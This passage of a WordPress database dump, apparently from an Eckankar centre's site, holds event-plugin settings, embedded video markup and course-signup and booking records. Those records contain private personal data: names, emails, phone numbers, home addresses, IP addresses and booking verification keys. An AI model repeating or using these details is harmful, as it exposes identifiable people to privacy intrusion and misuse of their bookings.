allowfullscreen></iframe>'),(195441,269352,'_oembed_time_bff9b01f87e9e8963e733f0ecf5b2049','1699119186'),(195442,269352,'_oembed_99473918a855179ddb5795f648a5bc43','<iframe title=\"Discover Eckankar and Advanced Spiritual Living\" width=\"1513\" height=\"851\" src=\"https://www.youtube.com/embed/s78XVcM7HWI?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen></iframe>'),(195443,269352,'_oembed_time_99473918a855179ddb5795f648a5bc43','1699119186'),(195444,7160,'_oembed_bff9b01f87e9e8963e733f0ecf5b2049','<iframe title=\"Discover Eckankar and Advanced Spiritual Living\" width=\"500\" height=\"281\" src=\"https://www.youtube.com/embed/s78XVcM7HWI?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen></iframe>'),(195445,7160,'_oembed_time_bff9b01f87e9e8963e733f0ecf5b2049','1700512091'),(195446,7160,'_oembed_99473918a855179ddb5795f648a5bc43','<iframe title=\"Discover Eckankar and Advanced Spiritual Living\" width=\"1513\" height=\"851\" src=\"https://www.youtube.com/embed/s78XVcM7HWI?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen></iframe>'),(195447,7160,'_oembed_time_99473918a855179ddb5795f648a5bc43','1699120941'),(195448,269364,'_field_654','Blaise'),(195449,269364,'_field_652','Simonelli'),(195450,269364,'_field_653','blaise.n.painting@gmail.com'),(195451,269364,'_field_651','(720) 356-2992'),(195452,269364,'_field_656','The Precepts of Eckankar - STARTS IN NOVEMBER -- 3rd Sunday at 900  1015 am - Zoom'),(195453,269364,'_field_649',''),(195454,269364,'_form_id','61'),(195455,269364,'_seq_num','112'),(195456,269365,'_field_654','Jay '),(195457,269365,'_field_652','Simonelli'),(195458,269365,'_field_653','simonellijay@gmail.com'),(195459,269365,'_field_651','(303) 245-0952'),(195460,269365,'_field_656','The Precepts of Eckankar - STARTS IN NOVEMBER -- 3rd Sunday at 900  1015 am - Zoom'),(195461,269365,'_field_649',''),(195462,269365,'_form_id','61'),(195463,269365,'_seq_num','113'),(195465,269366,'_field_652','Sutton'),(195466,269366,'_field_653','lynnzies3@gmail.com'),(195467,269366,'_field_651','(970) 903-5516'),(195468,269366,'_field_656','The ECK Satsang Discourses  First Series - STARTS IN NOVEMBER -- 1st Sunday at 1145 am  100 pm - Zoom'),(195469,269366,'_field_649',''),(195470,269366,'_form_id','61'),(195471,269366,'_seq_num','114'),(195472,269367,'_field_654','Diane '),(195473,269367,'_field_652','Conrad'),(195474,269367,'_field_653','conraddw@centurylink.net'),(195475,269367,'_field_651','(719) 598-7690'),(195476,269367,'_field_656','Letters of Light and Sound 2 - STARTS IN FEBRUARY -- 2nd Tuesday at 700 pm - Zoom'),(195477,269367,'_field_649',''),(195478,269367,'_form_id','61'),(195479,269367,'_seq_num','115'),(195481,269368,'_field_652','neal'),(195482,269368,'_field_653','lester@bresnan.net'),(195483,269368,'_field_651','(970) 426-9272'),(195484,269368,'_field_656','The ECK Satsang Discourses  First Series - STARTS IN NOVEMBER -- 1st Sunday at 1145 am  100 pm - Zoom'),(195485,269368,'_field_649',''),(195486,269368,'_form_id','61'),(195487,269368,'_seq_num','116'),(195488,269369,'_field_654','Amara'),(195489,269369,'_field_652','East'),(195490,269369,'_field_653','amaraeast@icloud.com'),(195491,269369,'_field_651','(303) 249-1856'),(195492,269369,'_field_656','Letters of Light and Sound 2 - STARTS IN FEBRUARY -- 2nd Tuesday at 700 pm - Zoom'),(195493,269369,'_field_649',''),(195494,269369,'_form_id','61'),(195495,269369,'_seq_num','117'),(195496,269370,'_field_224','Carolyn'),(195497,269370,'_field_225','Graff'),(195498,269370,'_field_226','zgraff@charter.net'),(195499,269370,'_field_227','WI'),(195500,269370,'_field_228','US'),(195501,269370,'_field_229','a:1:{i:0;s:8:\"Loveland\";}'),(195502,269370,'_form_id','21'),(195503,269370,'_seq_num','190'),(195504,269371,'_field_654','Jeanie'),(195505,269371,'_field_652','Morrissey'),(195506,269371,'_field_653','keje9@yahoo.com'),(195507,269371,'_field_651','(303) 906-7571'),(195508,269371,'_field_656','The ECK Satsang Discourses  Second Series - STARTS IN NOVEMBER -- 1st Tuesday at 700 pm - Zoom'),(195509,269371,'_field_649',''),(195510,269371,'_form_id','61'),(195511,269371,'_seq_num','118'),(195514,7160,'_oembed_8321e62a7671ab9ea2a8b6a911c25a36','<iframe title=\"Discover Eckankar and Advanced Spiritual Living\" width=\"1493\" height=\"840\" src=\"https://www.youtube.com/embed/s78XVcM7HWI?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen></iframe>'),(195515,7160,'_oembed_time_8321e62a7671ab9ea2a8b6a911c25a36','1699761789'),(195516,269377,'mec_transaction_id','GHY43151'),(195517,269377,'mec_gateway','MEC_gateway_free'),(195518,269377,'mec_gateway_label','Free'),(195519,269377,'mec_user_id','1000094'),(195520,269377,'mec_verified','1'),(195521,269377,'mec_verification_key','e89f6ae3f4ccd116d74968db4f51013b'),(195522,269377,'mec_cancellation_key','55e06072445c1f0f66b4abc88eb0ae93'),(195523,269377,'mec_confirmed','1'),(195524,269377,'mec_event_id','269260'),(195525,269377,'mec_date','1699785000:1699831800'),(195526,269377,'mec_ticket_id',',1,'),(195527,269377,'mec_booking_time','2023-11-12 07:38:09'),(195528,269377,'mec_all_dates','a:0:{}'),(195529,269377,'mec_other_dates','a:0:{}'),(195530,269377,'mec_attention_time','1699785000:1699831800'),(195531,269377,'mec_attention_time_start','1699785000'),(195532,269377,'mec_attention_time_end','1699831800'),(195533,269377,'mec_book_date_submit','20231112073809'),(195534,269377,'mec_booking_location','129'),(195535,269377,'mec_ticket_price_1','0'),(195536,269377,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:21:\"jennydelapp@yahoo.com\";s:4:\"name\";s:21:\"Jenny DeLapp Gallegos\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:11:\"24.8.36.104\";}}'),(195537,269377,'mec_price','0'),(195538,269377,'mec_payable','0'),(195539,269377,'mec_local_timezone','America/Denver'),(195540,269378,'mec_transaction_id','RYC38070'),(195541,269378,'mec_gateway','MEC_gateway_free'),(195542,269378,'mec_gateway_label','Free'),(195543,269378,'mec_user_id','1000007'),(195544,269378,'mec_verified','1'),(195545,269378,'mec_verification_key','5695c374ddf9279939ac9d8ecf2230c5'),(195546,269378,'mec_cancellation_key','bc5a392641f529d0fb89c6372f9083a9'),(195547,269378,'mec_confirmed','1'),(195548,269378,'mec_event_id','269260'),(195549,269378,'mec_date','1699785000:1699831800'),(195550,269378,'mec_ticket_id',',1,'),(195551,269378,'mec_booking_time','2023-11-12 09:12:43'),(195552,269378,'mec_all_dates','a:0:{}'),(195553,269378,'mec_other_dates','a:0:{}'),(195554,269378,'mec_attention_time','1699785000:1699831800'),(195555,269378,'mec_attention_time_start','1699785000'),(195556,269378,'mec_attention_time_end','1699831800'),(195557,269378,'mec_book_date_submit','20231112091243'),(195558,269378,'mec_booking_location','129'),(195559,269378,'mec_ticket_price_1','0'),(195560,269378,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:20:\"billybobak@yahoo.com\";s:4:\"name\";s:15:\"marc massengale\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:12:\"35.136.41.82\";}}'),(195561,269378,'mec_price','0'),(195562,269378,'mec_payable','0'),(195563,269378,'mec_local_timezone','America/New_York'),(195564,269379,'mec_transaction_id','JFX18094'),(195565,269379,'mec_gateway','MEC_gateway_free'),(195566,269379,'mec_gateway_label','Free'),(195567,269379,'mec_user_id','1000023'),(195568,269379,'mec_verified','1'),(195569,269379,'mec_verification_key','d833c011084eba04434b3f000de92e8a'),(195570,269379,'mec_cancellation_key','4939ce4a91f5483481e5291c9d565f35'),(195571,269379,'mec_confirmed','1'),(195572,269379,'mec_event_id','269260'),(195573,269379,'mec_date','1699785000:1699831800'),(195574,269379,'mec_ticket_id',',1,'),(195575,269379,'mec_booking_time','2023-11-12 10:41:14'),(195576,269379,'mec_all_dates','a:0:{}'),(195577,269379,'mec_other_dates','a:0:{}'),(195578,269379,'mec_attention_time','1699785000:1699831800'),(195579,269379,'mec_attention_time_start','1699785000'),(195580,269379,'mec_attention_time_end','1699831800'),(195581,269379,'mec_book_date_submit','20231112104114'),(195582,269379,'mec_booking_location','129'),(195583,269379,'mec_ticket_price_1','0'),(195584,269379,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:19:\"bngstreet@gmail.com\";s:4:\"name\";s:18:\"Bonnie Greenstreet\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:12:\"184.55.32.94\";}}'),(195585,269379,'mec_price','0'),(195586,269379,'mec_payable','0'),(195587,269379,'mec_local_timezone','America/Chicago'),(195588,269380,'mec_transaction_id','RPB39035'),(195589,269380,'mec_gateway','MEC_gateway_free'),(195590,269380,'mec_gateway_label','Free'),(195591,269380,'mec_user_id','1000095'),(195592,269380,'mec_verified','1'),(195593,269380,'mec_verification_key','b4739982f86c90efc36ff96f7b7d9a11'),(195594,269380,'mec_cancellation_key','96256c562bc527c53748e0d4d245daf1'),(195595,269380,'mec_confirmed','1'),(195596,269380,'mec_event_id','269260'),(195597,269380,'mec_date','1699785000:1699831800'),(195598,269380,'mec_ticket_id',',1,'),(195599,269380,'mec_booking_time','2023-11-12 10:46:33'),(195600,269380,'mec_all_dates','a:0:{}'),(195601,269380,'mec_other_dates','a:0:{}'),(195602,269380,'mec_attention_time','1699785000:1699831800'),(195603,269380,'mec_attention_time_start','1699785000'),(195604,269380,'mec_attention_time_end','1699831800'),(195605,269380,'mec_book_date_submit','20231112104633'),(195606,269380,'mec_booking_location','129'),(195607,269380,'mec_ticket_price_1','0'),(195608,269380,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:18:\"kbatty11@yahoo.com\";s:4:\"name\";s:12:\"Kim Stoltman\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:14:\"174.16.146.234\";}}'),(195609,269380,'mec_price','0'),(195610,269380,'mec_payable','0'),(195611,269380,'mec_local_timezone','America/Denver'),(195612,269381,'_field_654','Carla'),(195613,269381,'_field_652','Marshall'),(195614,269381,'_field_653','ati2125@aol.com'),(195615,269381,'_field_651','(504) 402-3752'),(195616,269381,'_field_656','The Master 1 Discourses - STARTS IN DECEMBER -- 2nd Monday at 700 pm - Zoom'),(195617,269381,'_field_649',''),(195618,269381,'_form_id','61'),(195619,269381,'_seq_num','119'),(195620,269382,'_field_496','Agnes'),(195621,269382,'_field_497','Hynes'),(195622,269382,'_field_498','(303) 434-2448'),(195623,269382,'_field_499','amhynes7@msn.com'),(195624,269382,'_field_500','496 W Caley Cir'),(195625,269382,'_field_501','Littleton'),(195626,269382,'_field_502','CO'),(195627,269382,'_field_503','US'),(195628,269382,'_field_505','Can you please send me the latest Colorado newsletter from the central ECK center?'),(195629,269382,'_form_id','53'),(195630,269382,'_seq_num','16'),(195631,269383,'_field_30','Monica'),(195632,269383,'_field_31','Tom'),(195633,269383,'_field_32','(303) 693-6597'),(195634,269383,'_field_33','mtom178488@sbcglobal.net'),(195635,269383,'_field_34','4972 S Coolidge Street'),(195636,269383,'_field_35','Aurora'),(195637,269383,'_field_36','CO'),(195638,269383,'_field_37','US'),(195639,269383,'_field_39','Please ensure that this email (mtom178488@sbcglobal.net) address is used to send me the Chela Monthly Newsletter.  \nI have not been receiving the newsletters for a long time.'),(195640,269383,'_form_id','4'),(195641,269383,'_seq_num','38'),(195642,269384,'_field_654','Debra'),(195643,269384,'_field_652','McElhaney'),(195644,269384,'_field_653','mcelhaneydebra@gmail.com'),(195645,269384,'_field_651','(303) 601-8787'),(195646,269384,'_field_656','The Easy Way Discourses - STARTS IN NOVEMBER -- 2nd Tuesday at 700 pm - Zoom'),(195647,269384,'_field_649',''),(195648,269384,'_form_id','61'),(195649,269384,'_seq_num','120'),(195650,269385,'_field_654','Carol'),(195651,269385,'_field_652','Schumacher '),(195652,269385,'_field_653','carolschu2017@gmail.com'),(195653,269385,'_field_651','(719) 685-6707'),(195654,269385,'_field_656','The ECK Dream 2 Discourses - STARTS IN NOVEMBER - 3rd Monday at 700 pm - Zoom -  Zoom'),(195655,269385,'_field_649','I’m looking forward to our class! Thanks for being our Arahata!'),(195656,269385,'_form_id','61'),(195657,269385,'_seq_num','121'),(195658,269387,'protect_children',''),(195659,269387,'mec_color',''),(195660,269387,'mec_location_id','118'),(195661,269387,'mec_dont_show_map','0'),(195662,269387,'mec_organizer_id','1'),(195663,269387,'mec_read_more',''),(195664,269387,'mec_more_info',''),(195665,269387,'mec_more_info_title',''),(195666,269387,'mec_more_info_target','_self'),(195667,269387,'mec_cost',''),(195668,269387,'mec_currency','a:0:{}'),(195669,269387,'mec_additional_organizer_ids','a:0:{}'),(195670,269387,'mec_additional_location_ids','a:0:{}'),(195671,269387,'mec_date','a:6:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-11-16\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2024-01-31\";s:4:\"hour\";s:1:\"6\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:9:\"hide_time\";s:1:\"1\";s:13:\"hide_end_time\";s:1:\"1\";s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(195672,269387,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(195673,269387,'mec_certain_weekdays','a:0:{}'),(195674,269387,'mec_allday','0'),(195675,269387,'one_occurrence','0'),(195676,269387,'mec_hide_time','1'),(195677,269387,'mec_hide_end_time','1'),(195678,269387,'mec_comment',''),(195679,269387,'mec_timezone','global'),(195680,269387,'mec_countdown_method','global'),(195681,269387,'mec_public','1'),(195682,269387,'mec_start_date','2023-11-16'),(195683,269387,'mec_start_time_hour','8'),(195684,269387,'mec_start_time_minutes','0'),(195685,269387,'mec_start_time_ampm','AM'),(195686,269387,'mec_start_day_seconds','28800'),(195687,269387,'mec_end_date','2024-01-31'),(195688,269387,'mec_end_time_hour','6'),(195689,269387,'mec_end_time_minutes','0'),(195690,269387,'mec_end_time_ampm','PM'),(195691,269387,'mec_end_day_seconds','64800'),(195692,269387,'mec_repeat_status','0'),(195693,269387,'mec_repeat_type',''),(195694,269387,'mec_repeat_interval','1'),(195695,269387,'mec_repeat_end',''),(195696,269387,'mec_repeat_end_at_occurrences','9'),(195697,269387,'mec_repeat_end_at_date',''),(195698,269387,'mec_advanced_days','a:0:{}'),(195699,269387,'mec_in_days',''),(195700,269387,'mec_not_in_days',''),(195701,269387,'mec_hourly_schedules','a:0:{}'),(195702,269387,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(195703,269387,'mec_tickets','a:0:{}'),(195704,269387,'mec_fees_global_inheritance','1'),(195705,269387,'mec_fees','a:0:{}'),(195706,269387,'mec_ticket_variations_global_inheritance','1'),(195707,269387,'mec_ticket_variations','a:0:{}'),(195708,269387,'mec_reg_fields_global_inheritance','1'),(195709,269387,'mec_reg_fields','a:0:{}'),(195710,269387,'mec_bfixed_fields','a:0:{}'),(195711,269387,'mec_op','a:0:{}'),(195712,269387,'mec_fields','a:0:{}'),(195713,269387,'mec_event_status','EventScheduled'),(195714,269387,'mec_moved_online_link',''),(195715,269387,'mec_cancelled_reason',''),(195716,269387,'mec_display_cancellation_reason_in_single_page',''),(195717,269387,'boldgrid_hide_page_title','0'),(195718,269387,'mec_notifications','a:4:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:16:\"certificate_send\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Event Attendee Certificates\";s:7:\"content\";s:252:\"<p>Hi %%name%%,</p>\r\n<p>Congratulations for successfully attending / completing the event %%event_title%%.<br />\r\nClick the following link to download or print your PDF certificate.</p>\r\n<p>%%certificate_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(195719,269387,'passster_activate_global_protection',NULL),(195720,269387,'passster_activate_protection',NULL),(195721,269387,'passster_protection_type','password'),(195722,269387,'boldgrid_in_page_containers','1'),(195723,269387,'passster_area_shortcode',''),(195724,269387,'_wp_old_date','2023-01-14'),(195725,269387,'mec_cost_auto_calculate','0'),(195726,269387,'mec_style_per_event','global'),(195727,269387,'mec_trailer_url',''),(195728,269387,'mec_trailer_title',''),(195729,269387,'mec_start_datetime','2023-11-16 08:00 AM'),(195730,269387,'mec_end_datetime','2024-01-31 06:00 PM'),(195731,269387,'mec_sequence','41'),(195732,269387,'mec_event_gallery','a:0:{}'),(195733,269387,'mec_related_events','a:0:{}'),(195734,269387,'mec_banner','a:0:{}'),(195737,269387,'_dp_original','268958'),(195736,269387,'_thumbnail_id','269388'),(195738,269387,'_edit_lock','1700246949:2'),(195739,269387,'_edit_last','2'),(195740,269388,'_wp_attached_file','2023/11/power-of-grace-streaming-1.jpg'),(195741,269388,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:795;s:6:\"height\";i:447;s:4:\"file\";s:38:\"2023/11/power-of-grace-streaming-1.jpg\";s:8:\"filesize\";i:78665;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"power-of-grace-streaming-1-350x196.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20500;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"power-of-grace-streaming-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9354;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"power-of-grace-streaming-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:62736;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:38:\"power-of-grace-streaming-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26516;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:38:\"power-of-grace-streaming-1-500x447.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:447;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:52600;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:38:\"power-of-grace-streaming-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:37086;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:38:\"power-of-grace-streaming-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27901;}s:8:\"tileview\";a:5:{s:4:\"file\";s:38:\"power-of-grace-streaming-1-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30713;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(195742,269388,'original-file','2023/11/power-of-grace-streaming-1-updraft-pre-smush-original.jpg'),(195743,269388,'smush-complete','1'),(195744,269388,'smush-info','The file was compressed from 76.82 KB to 65.83 KB, saving 14.31 percent, using WP-Optimize'),(195745,269388,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:78665;s:12:\"smushed-size\";i:67409;s:15:\"savings-percent\";d:14.3100000000000004973799150320701301097869873046875;s:10:\"sizes-info\";a:9:{s:4:\"full\";a:2:{s:8:\"original\";i:78665;s:10:\"compressed\";i:67409;}s:6:\"medium\";a:2:{s:8:\"original\";i:20500;s:10:\"compressed\";i:19107;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:9354;s:10:\"compressed\";i:8910;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:62736;s:10:\"compressed\";i:57999;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:26516;s:10:\"compressed\";i:24649;}s:12:\"thumbrelated\";a:2:{s:8:\"original\";i:52600;s:10:\"compressed\";i:48533;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:37086;s:10:\"compressed\";i:34553;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:27901;s:10:\"compressed\";i:26359;}s:8:\"tileview\";a:2:{s:8:\"original\";i:30713;s:10:\"compressed\";i:28419;}}}'),(195746,269392,'protect_children',''),(195747,269392,'mec_color',''),(195748,269392,'mec_location_id','118'),(195749,269392,'mec_dont_show_map','0'),(195750,269392,'mec_organizer_id','1'),(195751,269392,'mec_read_more',''),(195752,269392,'mec_more_info',''),(195753,269392,'mec_more_info_title',''),(195754,269392,'mec_more_info_target','_self'),(195755,269392,'mec_cost',''),(195756,269392,'mec_currency','a:0:{}'),(195757,269392,'mec_additional_organizer_ids','a:0:{}'),(195758,269392,'mec_additional_location_ids','a:0:{}'),(195759,269392,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-12-06\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-12-06\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(195760,269392,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(195761,269392,'mec_certain_weekdays','a:0:{}'),(195762,269392,'mec_allday','0'),(195763,269392,'one_occurrence','0'),(195764,269392,'mec_hide_time','0'),(195765,269392,'mec_hide_end_time','0'),(195766,269392,'mec_comment',''),(195767,269392,'mec_timezone','global'),(195768,269392,'mec_countdown_method','global'),(195769,269392,'mec_public','1'),(195770,269392,'mec_start_date','2023-12-06'),(195771,269392,'mec_start_time_hour','7'),(195772,269392,'mec_start_time_minutes','0'),(195773,269392,'mec_start_time_ampm','PM'),(195774,269392,'mec_start_day_seconds','68400'),(195775,269392,'mec_end_date','2023-12-06'),(195776,269392,'mec_end_time_hour','8'),(195777,269392,'mec_end_time_minutes','0'),(195778,269392,'mec_end_time_ampm','PM'),(195779,269392,'mec_end_day_seconds','72000'),(195780,269392,'mec_repeat_status','0'),(195781,269392,'mec_repeat_type',''),(195782,269392,'mec_repeat_interval','1'),(195783,269392,'mec_repeat_end',''),(195784,269392,'mec_repeat_end_at_occurrences','9'),(195785,269392,'mec_repeat_end_at_date',''),(195786,269392,'mec_advanced_days','a:0:{}'),(195787,269392,'mec_in_days',''),(195788,269392,'mec_not_in_days',''),(195789,269392,'mec_hourly_schedules','a:0:{}'),(195790,269392,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(195791,269392,'mec_tickets','a:0:{}'),(195792,269392,'mec_fees_global_inheritance','1'),(195793,269392,'mec_fees','a:0:{}'),(195794,269392,'mec_ticket_variations_global_inheritance','1'),(195795,269392,'mec_ticket_variations','a:0:{}'),(195796,269392,'mec_reg_fields_global_inheritance','1'),(195797,269392,'mec_reg_fields','a:0:{}'),(195798,269392,'mec_bfixed_fields','a:0:{}'),(195799,269392,'mec_op','a:0:{}'),(195800,269392,'mec_fields','a:0:{}'),(195801,269392,'mec_event_status','EventScheduled'),(195802,269392,'mec_moved_online_link',''),(195803,269392,'mec_cancelled_reason',''),(195804,269392,'mec_display_cancellation_reason_in_single_page',''),(195805,269392,'boldgrid_hide_page_title','0'),(195806,269392,'mec_notifications','a:4:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:16:\"certificate_send\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Event Attendee Certificates\";s:7:\"content\";s:252:\"<p>Hi %%name%%,</p>\r\n<p>Congratulations for successfully attending / completing the event %%event_title%%.<br />\r\nClick the following link to download or print your PDF certificate.</p>\r\n<p>%%certificate_link%%</p>\r\n<p>Regards,<br 